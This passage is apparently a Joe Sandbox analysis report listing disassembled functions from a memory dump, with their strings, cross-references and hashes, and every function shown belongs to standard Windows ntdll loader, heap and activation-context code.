                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-204845295
                                                              • Opcode ID: 33d10fbdf67113995580cde91222cf73708464d8fa13d96e583a6256760ee810
                                                              • Instruction ID: cfa50910c454546ee706fa4fe1afa5d6ead70b594518d36c3c714bc1039663e2
                                                              • Opcode Fuzzy Hash: 33d10fbdf67113995580cde91222cf73708464d8fa13d96e583a6256760ee810
                                                              • Instruction Fuzzy Hash: 335180712087059FEB25DF24DC81BABBBE9FF84648F44091DF6859F260D670E948CB92
                                                              Function 015D2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlGetAssemblyStorageRoot, xrefs: 01612160, 0161219A, 016121BA
                                                              • SXS: %s() passed the empty activation context, xrefs: 01612165
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01612178
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0161219F
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016121BF
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01612180
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                              • API String ID: 0-861424205
                                                              • Opcode ID: 3c3c8f1255436e58271d7522146e9fa3e46bafe69fafa78baeb87b3fb55577a3
                                                              • Instruction ID: 9051285ce87ba686c1f5712cb5894ec2ec3a24ece4aa4623b17ea143850a6db6
                                                              • Opcode Fuzzy Hash: 3c3c8f1255436e58271d7522146e9fa3e46bafe69fafa78baeb87b3fb55577a3
                                                              • Instruction Fuzzy Hash: E9313536F002217BE731DA998C82F5A7A79FF65A40F29409DFB04BF204D7709A01CBA0
                                                              Function 015DC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpInitializeProcess, xrefs: 015DC6C4
                                                              • Loading import redirection DLL: '%wZ', xrefs: 01618170
                                                              • LdrpInitializeImportRedirection, xrefs: 01618177, 016181EB
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 016181E5
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01618181, 016181F5
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015DC6C3
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-475462383
                                                              • Opcode ID: bd777a779e1236b6779731eacd62f2fbd456d75ccf0245ec6dc2c3bf982a731c
                                                              • Instruction ID: 4d2b8de06c89927004de29cc32d6d61a9f9958929a358fc6f6274c248ac02b3e
                                                              • Opcode Fuzzy Hash: bd777a779e1236b6779731eacd62f2fbd456d75ccf0245ec6dc2c3bf982a731c
                                                              • Instruction Fuzzy Hash: 1031CE726447529FC224EF6CDD86E2A7BE9BB94A20F04055CF945AF391E660EC04C7A2
                                                              Function 015E096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 015E2DF0: LdrInitializeThunk.NTDLL ref: 015E2DFA
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E0BA3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E0BB6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E0D60
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E0D74
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                              • String ID:
                                                              • API String ID: 1404860816-0
                                                              • Opcode ID: fb64568e1866b5cd3d2ae65221675fb209b5b938173a5d378c94b8b9d6a3414d
                                                              • Instruction ID: 3d536ab001ed9443aeb783f88d6b6cf37ffd75c2e57e9dc2e5ed4b96e5e8374d
                                                              • Opcode Fuzzy Hash: fb64568e1866b5cd3d2ae65221675fb209b5b938173a5d378c94b8b9d6a3414d
                                                              • Instruction Fuzzy Hash: B9427B71A00716DFDB25CF28C894BAAB7F5FF44304F0485A9E989EB245D770AA85CF60
                                                              Function 015AA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              • API String ID: 0-379654539
                                                              • Opcode ID: 36fe068063a2b9555505e2fa2149f07b27844c952971311730bb2663e0d66727
                                                              • Instruction ID: 79865e975e0248c7da5083373ddda810ca3b69e3f3732b466848dad2097ae0b3
                                                              • Opcode Fuzzy Hash: 36fe068063a2b9555505e2fa2149f07b27844c952971311730bb2663e0d66727
                                                              • Instruction Fuzzy Hash: F8C19A705483828FDB26CF58C444B6EBBE4BF88704F44886EF9958B391E734C949CB56
                                                              Function 015D8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • @, xrefs: 015D8591
                                                              • LdrpInitializeProcess, xrefs: 015D8422
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 015D855E
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015D8421
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1918872054
                                                              • Opcode ID: bcb40d4c9584ebb7ad5a3677efa4261dea0b966195fff1666dda662bd2961d06
                                                              • Instruction ID: fc847c9a09a9655ca4059d69a918008a1015da5b3c4d0e050a81b75973170d5e
                                                              • Opcode Fuzzy Hash: bcb40d4c9584ebb7ad5a3677efa4261dea0b966195fff1666dda662bd2961d06
                                                              • Instruction Fuzzy Hash: 43918D71908346AFD722DF69CC81EAFBAECBF84744F44092EF6859A155E370D904CB62
                                                              Function 015D273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • .Local, xrefs: 015D28D8
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016122B6
                                                              • SXS: %s() passed the empty activation context, xrefs: 016121DE
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016121D9, 016122B1
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                              • API String ID: 0-1239276146
                                                              • Opcode ID: 695226ebd490745059eab16bb11d544d0d6c1621083d9400c760276f60e501eb
                                                              • Instruction ID: 17c3fdf4364b5b3325387f7d12a03db770a253e373e5c13f50019e89384444df
                                                              • Opcode Fuzzy Hash: 695226ebd490745059eab16bb11d544d0d6c1621083d9400c760276f60e501eb
                                                              • Instruction Fuzzy Hash: 0AA1BB3190122A9BDB35CF68DC88BA9B7B1BF58354F2445EAD908AB355D7309EC1CF90
                                                              Function 015D4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01613456
                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0161342A
                                                              • RtlDeactivateActivationContext, xrefs: 01613425, 01613432, 01613451
                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01613437
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                              • API String ID: 0-1245972979
                                                              • Opcode ID: 7aaaaafe0e2d057b2c8689a648979ba43fcec2387bd8811e9b14dfb389c175d2
                                                              • Instruction ID: f5a3875438e9abaae3c5cc4e7968a23469c777ccd225d76eee40f468a59f0112
                                                              • Opcode Fuzzy Hash: 7aaaaafe0e2d057b2c8689a648979ba43fcec2387bd8811e9b14dfb389c175d2
                                                              • Instruction Fuzzy Hash: 936102326516129BDB32CF1CCC81B2AB7E5BF90B20F188529E9969F754D730E801CB91
                                                              Function 015A64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016010AE
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0160106B
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01600FE5
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01601028
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                              • API String ID: 0-1468400865
                                                              • Opcode ID: bfb35e05b06bef87eba0864c4813b3749242134e1d37a81b52484c4d81419f69
                                                              • Instruction ID: 218e13f647e4866402be6c0ae333ac20cf2535a56aeb38f4c31df0680c333229
                                                              • Opcode Fuzzy Hash: bfb35e05b06bef87eba0864c4813b3749242134e1d37a81b52484c4d81419f69
                                                              • Instruction Fuzzy Hash: CB71C0B19043069FCB21DF18C884B9B7FE9BF99754F844469F9888F286D734D588CB92
                                                              Function 015C245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpDynamicShimModule, xrefs: 0160A998
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0160A992
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0160A9A2
                                                              • apphelp.dll, xrefs: 015C2462
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-176724104
                                                              • Opcode ID: 1fd6437b4458e27d2cbb8e91f75bc86b5ed9c9d455056f05d7bfb5d5efdf55bc
                                                              • Instruction ID: 2375b99c124849885a5154be8cd810ff542f9e09fd8db5cda2bd906908186f34
                                                              • Opcode Fuzzy Hash: 1fd6437b4458e27d2cbb8e91f75bc86b5ed9c9d455056f05d7bfb5d5efdf55bc
                                                              • Instruction Fuzzy Hash: B7312871610302ABDB369FEDDD85A6EB7B9FB80B44F16001DE9016F385C7705892C790
                                                              Function 015B29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 015B327D
                                                              • HEAP[%wZ]: , xrefs: 015B3255
                                                              • HEAP: , xrefs: 015B3264
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                              • API String ID: 0-617086771
                                                              • Opcode ID: b7a25ade2aeb49265009fa455005297e4063b9814768586b2a64b434f6c6e948
                                                              • Instruction ID: cc8986532be024797f131071bf7b62554e83da0fb6607f40ce869ee215a02b67
                                                              • Opcode Fuzzy Hash: b7a25ade2aeb49265009fa455005297e4063b9814768586b2a64b434f6c6e948
                                                              • Instruction Fuzzy Hash: FF929A71A046499FDB25CF68C8847EEBBF1FF48300F188499E859AF291D735A945CF60
                                                              Function 015B0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-4253913091
                                                              • Opcode ID: 63ae19da1c96fffb46d639f8815719ccaacd4d21bfdccb835705352dd1c63e9f
                                                              • Instruction ID: 4144466f2eaa0450e39489336a0de35149c286bb65d26989d0c854ef16ae5673
                                                              • Opcode Fuzzy Hash: 63ae19da1c96fffb46d639f8815719ccaacd4d21bfdccb835705352dd1c63e9f
                                                              • Instruction Fuzzy Hash: 2AF17830A00606DFEB2ACF68C894BABB7F5FF44704F1485A9E5169B391D734A981CF91
                                                              Function 015C6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $@
                                                              • API String ID: 0-1077428164
                                                              • Opcode ID: a4402739ccf5128ef30a0f87f727d7a60a17751f82a306fc6305f7ff46426195
                                                              • Instruction ID: 2b552d2cf512e3a04d59eb3bedd4f9b897201497e2fa2a49e256a44c465e0325
                                                              • Opcode Fuzzy Hash: a4402739ccf5128ef30a0f87f727d7a60a17751f82a306fc6305f7ff46426195
                                                              • Instruction Fuzzy Hash: EEC28E716083419FD72ACF68C881BABBBE5BFC8B14F04896DE9898B341D774D905CB52
                                                              Function 0159A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              • API String ID: 0-2779062949
                                                              • Opcode ID: fa96f6e1a8a591a0449cf534bf84bf0cf240d2904cdffcdb3cf770b675842ee7
                                                              • Instruction ID: 994a23e8e7f9a7618b783e989dd0058f52ad67dbeadc075fbd0bdb6b81baab2c
                                                              • Opcode Fuzzy Hash: fa96f6e1a8a591a0449cf534bf84bf0cf240d2904cdffcdb3cf770b675842ee7
                                                              • Instruction Fuzzy Hash: A0A14B7591162A9BDF319F68CC88BAEB7B8FF44700F1041E9DA09AB250E7359E84CF50
                                                              Function 015C0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpCheckModule, xrefs: 0160A117
                                                              • Failed to allocated memory for shimmed module list, xrefs: 0160A10F
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0160A121
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-161242083
                                                              • Opcode ID: 74fc4855f08eae96ce7c19236a405de759b19a901489591e53c9bd0397835093
                                                              • Instruction ID: 1ab411b29e7713152905089d03af22332a38f4ef9938795809792b0ba7482769
                                                              • Opcode Fuzzy Hash: 74fc4855f08eae96ce7c19236a405de759b19a901489591e53c9bd0397835093
                                                              • Instruction Fuzzy Hash: 0A71BE75A00306DFDB2ADFA8CD85ABEB7F4FB84604F14446DE912AB391E734A941CB50
                                                              Function 015B0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-1334570610
                                                              • Opcode ID: 2c939e09984470785bc654750182346d7c0a79d05ae21be2c89d59ed56aa7a7f
                                                              • Instruction ID: 7e5460b3be8e3ed3f1d1a6537adb136339439f57e9b0d45fcd23bfc45de055e2
                                                              • Opcode Fuzzy Hash: 2c939e09984470785bc654750182346d7c0a79d05ae21be2c89d59ed56aa7a7f
                                                              • Instruction Fuzzy Hash: 4D619E716003069FDB29CF28D880BABBBF5FF45704F148959E45A8F292D7B0E881CB95
                                                              Function 015DC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Failed to reallocate the system dirs string !, xrefs: 016182D7
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 016182E8
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 016182DE
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1783798831
                                                              • Opcode ID: 4bab97c1d1ee8a7ba6c7385f60b6bfd8770ff7988f2f6bdbd5ed923070d7ad6e
                                                              • Instruction ID: bc9878863b2af4399c441570474a139eff8628fda70c8778e01b1286979ce0d7
                                                              • Opcode Fuzzy Hash: 4bab97c1d1ee8a7ba6c7385f60b6bfd8770ff7988f2f6bdbd5ed923070d7ad6e
                                                              • Instruction Fuzzy Hash: F841BF71551312ABCB31EF69DC84B5B77ECBF88650F05492EB948DB294E770E810CB92
                                                              Function 0165C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • PreferredUILanguages, xrefs: 0165C212
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0165C1C5
                                                              • @, xrefs: 0165C1F1
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              • Opcode ID: 2456875319e214b47dcb926c6b46ab439e8075f2c6570f3ce656f9946a6756e5
                                                              • Instruction ID: b2c93ff6ea3b8c83dcbebc3dcf9b958b024f181c78175e32679a287affd448a6
                                                              • Opcode Fuzzy Hash: 2456875319e214b47dcb926c6b46ab439e8075f2c6570f3ce656f9946a6756e5
                                                              • Instruction Fuzzy Hash: 10417071E0030AEBDF55DAD8CC91BEEBBBCBB54744F14806AEA09B7240D7749A448B90
                                                              Function 01634144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              • Opcode ID: 6831df71530d5ab50ff053ba2c354045e53dcc3e80aa9ed703295a9668d856a2
                                                              • Instruction ID: 974da090420c15ad89fbc14ead1811cb92100df0ceb410ba7f8c3adadcf38e7f
                                                              • Opcode Fuzzy Hash: 6831df71530d5ab50ff053ba2c354045e53dcc3e80aa9ed703295a9668d856a2
                                                              • Instruction Fuzzy Hash: 1341CF32A006598FEB26DBA9CC44BADFBB9FF95340F14045AD901BF791DB758901CB50
                                                              Function 01624755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01624888
                                                              • LdrpCheckRedirection, xrefs: 0162488F
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01624899
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-3154609507
                                                              • Opcode ID: a7a49ee4160ccab096bb75be9b7b168026cfef67af1791fe96862da941a42a0a
                                                              • Instruction ID: 30fdcd8ba1ef0d45ad7478fefecd4a439ff92a2604a535574f10bb9a30a07fc8
                                                              • Opcode Fuzzy Hash: a7a49ee4160ccab096bb75be9b7b168026cfef67af1791fe96862da941a42a0a
                                                              • Instruction Fuzzy Hash: BD41CF32A14B719BCB21CF68DC40A267BE9BF49B90B06056DED99DB351DB74D800CF91
                                                              Function 015B0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-2558761708
                                                              • Opcode ID: 3dd17c5f007d688c5917f5a8846d13839c8e721569a95ea58629f28e1c0759a2
                                                              • Instruction ID: 3295c400d32c755ead8073b88f114a50807e39d0572a72e34ca5ec070d8f01b0
                                                              • Opcode Fuzzy Hash: 3dd17c5f007d688c5917f5a8846d13839c8e721569a95ea58629f28e1c0759a2
                                                              • Instruction Fuzzy Hash: 2F11CD313261029FDB2ECA18D885BBBB3A5BF40B16F198169F4068F291DB34D841CB55
                                                              Function 016220DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpInitializationFailure, xrefs: 016220FA
                                                              • Process initialization failed with status 0x%08lx, xrefs: 016220F3
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01622104
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2986994758
                                                              • Opcode ID: 9d143a6c6fa914ee332bf7aa93f854caae9a2eb12e76a9afd4769685983d17bb
                                                              • Instruction ID: 219c2f44e49734ab5a2b7ca7e89c7859ac03b509d44dbe4221a1e6693f6c7a72
                                                              • Opcode Fuzzy Hash: 9d143a6c6fa914ee332bf7aa93f854caae9a2eb12e76a9afd4769685983d17bb
                                                              • Instruction Fuzzy Hash: 99F0AF75640719ABEB24EA4C9C5AFA93BADFB40A54F20005DFB007B785D2A0A950CA95
                                                              Function 015B03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              • Opcode ID: af626a1fd48ce93b38a356019019b7bb8dd27961d32e0bece709f56fb2dded21
                                                              • Instruction ID: e556e5e67d44f6aa9b70610324a4a6dcc02c878bf4333edfc40386924285a7e4
                                                              • Opcode Fuzzy Hash: af626a1fd48ce93b38a356019019b7bb8dd27961d32e0bece709f56fb2dded21
                                                              • Instruction Fuzzy Hash: A7713C71A0014A9FDB15DFA8CD94BAEB7F8BF48744F144465EA05EB291EB38ED01CB60
                                                              Function 015AA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrResSearchResource Enter, xrefs: 015AAA13
                                                              • LdrResSearchResource Exit, xrefs: 015AAA25
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
